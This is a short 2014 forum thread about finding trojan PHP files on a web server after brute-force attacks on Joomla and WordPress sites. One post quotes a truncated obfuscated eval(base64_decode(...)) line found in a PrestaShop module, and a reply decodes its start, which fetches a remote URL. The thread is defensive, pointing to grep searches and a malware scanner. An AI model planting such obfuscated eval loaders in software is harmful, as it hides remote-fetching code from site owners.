Finding Exploits and Trojan php hacks

**fulltilt** · Apr 26th 2014

anyone knows how to perform a search to find exploits and trojan php hacks in /var/www/virtual/*
I had many bruteforce attacks on joomla and WP sites and this server produces high load, so I'll need to check the webs

**TheCry** · Apr 26th 2014

Use the search engine of the forum. I'd post a line to find the executeable files in the webspace. Normaly the files are executeable. Then you can grep them for base64_encode.

**fulltilt** · Apr 26th 2014

thank you, are all this files infected and should be removed?
I have found this in a prestashop module:

Code

// Il est strictement interdit d'enlever ceci sous peine de poursuite pour la version gratuite.
eval(base64_decode('CQkkdXJsID0gJ2h0dHA6Ly9yc3MuZGRseC5vcmcvc2l0ZXMueG1sJzsNCgkJJGNvbnRlbnQgPSAnJzsNCgkJJGNvbnRlbnUg$
return $this->display(__FILE__, 'ddlx_xtreme_footer.tpl');
}

**Cool** · Apr 26th 2014

if you just decode it then you´ll se it as is:

Code

$url = 'http://rss.ddlx.org/sites.xml';
$content = '';
$contenu

BeNe · Apr 26th 2014

I use malted for this --> https://www.rfxn.com/projects/linux-malware-detect/
Run's as a cronjob every night and scans /var/www/virtual/.

Works very good for me and dectected many base64 php codes and malware.
malted send you an email about the last found and can move files to quaratine if you want.

Finding Exploits and Trojan php hacks

Share

Daily visitors